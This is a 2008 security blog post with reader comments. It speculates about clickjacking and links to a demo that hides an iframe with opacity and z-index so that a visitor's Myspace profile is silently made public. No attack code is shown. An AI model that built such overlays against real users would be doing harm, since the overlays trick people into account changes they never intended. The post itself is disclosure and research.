Real Clickjacking?

UPDATE: In Spring of 2010 BreakingPoint unveiled the pioneering Cyber Tomography Machine to help you with problems such as the ones described in this post. Read more.

After Michael Zalewski's WHATWG post spilled enough beans to show definitely that yesterday's pop-up evaders weren't "clickjacking," I put together another demo this afternoon (link below), which uses a combination of opacity and z-index settings on an iframe. Again, it's just speculation.

http://www.planb-security.net/notclickjacking/iframetrick.html

This seems to fit the bill: No Javascript required, uses iframes, and gives the ability to seemingly overlay one UI on top of another. By the way, the demo is mostly harmless -- it just turns your Myspace profile from private to public. I started down the path of masking my brokerage's trading app, but masking out keystrokes for stock orders seemed to be overkill for a simple speculative demo.

Posted by Tod Beardsley

2 comments
Tags:

Comments

jesse

scary

Fascinating stuff, it seems that extending browser capability always seems to suffer from the "law" of unintended consequences. I just hope by form submitting this comment, I'm not changing my bank login name to admin@breakingpointsystems :P

September 29, 2008, 8:36 AM

Rhian

Very scary indeed

Indeed scary!

It makes me even more glad I have NoScript installed and went a bit paranoid in the settings. (For example I had iFrames disabled).

I went to the example, NoScript in my default internet surfing mode. It was good to see that it was blocked! The interesting part was that I could see the action that was going to happen in a tooltip!

Thanks to the guys of BreakingPoint for pointing out these issues and providing (links to) Real Working Examples.

October 6, 2008, 7:34 AM

Videos

More >

Interact

Twitter

Facebook

Email

LinkedIn

YouTube

Newsletter